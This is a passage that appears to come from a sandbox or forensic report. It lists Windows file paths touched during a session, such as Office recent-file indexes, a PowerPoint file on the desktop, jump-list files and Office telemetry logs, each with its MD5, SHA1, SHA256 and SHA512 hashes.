| SHA512 | 98c5f56f3de340690c139e58eb7dac111979f0d4dffe9c4b24ff849510f4b6ffa9fd608c0a3de9ac3c9fd2190f0efaf715309061490f9755a9bfdf1c54ca0d84 |
C:\Users\Admin\AppData\Roaming\Microsoft\Office\Recent\index.dat
| MD5 | f55463b1a128efa903fb629adca6b7ce |
| SHA1 | fecee0b79e29631248a83cf89728c5a8f0784a0f |
| SHA256 | f71f289fd5193e28ab535eb1905d625680a120b800679a4c85c3b8b0c191aa5a |
| SHA512 | 39db33612b5b8702e1e3983def08c039fabf368aeb55c5d4147806f3fcd79da4f4c8cec6fed04b02fa41e55eaba4cfc4d1820c148737cf02379f01acc598008a |
C:\Users\Admin\Desktop\Baif oc -efjie.pptx
| MD5 | a929d0cc07ca52a3e84dfb0aa4a904ad |
| SHA1 | e63098355e5f94f75646aebbc3c137d8ca069350 |
| SHA256 | 1119508499e37575904be55842820c0c993175e490364b76ceca0d92600aa378 |
| SHA512 | 5a8cb35926c43f6461e674c4757947a664f75b2be181c42208aa0e86c293618fab5e1b2884cd4bf729243ace5e26123635654dd7c892b2c6d5fde310fc2fa4d5 |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d00655d2aa12ff6d.customDestinations-ms
| MD5 | f89d917428aa9ed8b93133b915aa8562 |
| SHA1 | b4b6a45d4da59e0b509ebba7448ba9d9c763e8b2 |
| SHA256 | 48b896e32c43849347f9b7277a22734d1fcc2720125892ff2c0bb259876c1994 |
| SHA512 | a8ed8e829b91f8d5b1b4d3bd5ffd145f53b3bb2f2720874f70ffd472188dca6c06659d3929fb96313d7e22fe46da0d275f5445877337ef2b7f461a5866bd0dcc |
C:\Users\Admin\AppData\Local\Microsoft\Office\16.0\Floodgate\Powerpoint.CampaignStates.json
| MD5 | f1b59332b953b3c99b3c95a44249c0d2 |
| SHA1 | 1b16a2ca32bf8481e18ff8b7365229b598908991 |
| SHA256 | 138e49660d259061d8152137abd8829acdfb78b69179890beb489fe3ffe23e0c |
| SHA512 | 3c1f99ecc394df3741be875fbe8d95e249d1d9ac220805794a22caf81620d5fdd3cce19260d94c0829b3160b28a2b4042e46b56398e60f72134e49254e9679a4 |
C:\Users\Admin\AppData\Local\Microsoft\Office\16.0\Floodgate\Powerpoint.SurveyEventActivityStats.json
| MD5 | 6ca4960355e4951c72aa5f6364e459d5 |
| SHA1 | 2fd90b4ec32804dff7a41b6e63c8b0a40b592113 |
| SHA256 | 88301f0b7e96132a2699a8bce47d120855c7f0a37054540019e3204d6bcbaba3 |
| SHA512 | 8544cd778717788b7484faf2001f463320a357db63cb72715c1395ef19d32eec4278bab07f15de3f4fed6af7e4f96c41908a0c45be94d5cdd8121877eccf310d |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d00655d2aa12ff6d.customDestinations-ms
| MD5 | 7989c2f0f3622677a859da707fd63c6d |
| SHA1 | 06442c4cef1d388fd67d55478082560a3c68691f |
| SHA256 | f0c5f10e0d3b59dfacc5594774a7f58bc3b2c6ae76ff8fa3fcaaacf033e5ac69 |
| SHA512 | e0f205e19c92d2d0d61007f325c77725b53d101638d6a6cc77acf2e41ad89e7804b8c5d76c66941c6debd060cb5fc094efbf5c9e21a1272803dbdae840515d47 |
C:\Users\Admin\AppData\Local\Microsoft\Office\DLP\mip\logs\mip_sdk.miplog
| MD5 | fe308d716c65a83f4b80eaeb5f6761fe |
| SHA1 | 867d029792faa49b16b8c27a030a50667f9ec147 |
| SHA256 | 362f35c4f957dff230c8b6e8e1a9208619db47f22c3a84f2d91866aad3d8de0e |
| SHA512 | 57076ede3a44adbf2ebae24d6e0bffdd089c7bc81fc7c8ce6a7ac5bc2eabb2f4d28e4ec6a0e8ca70d7056fd35c0a0bdd3c7f8f776b90ecd32f03533e2aee2161 |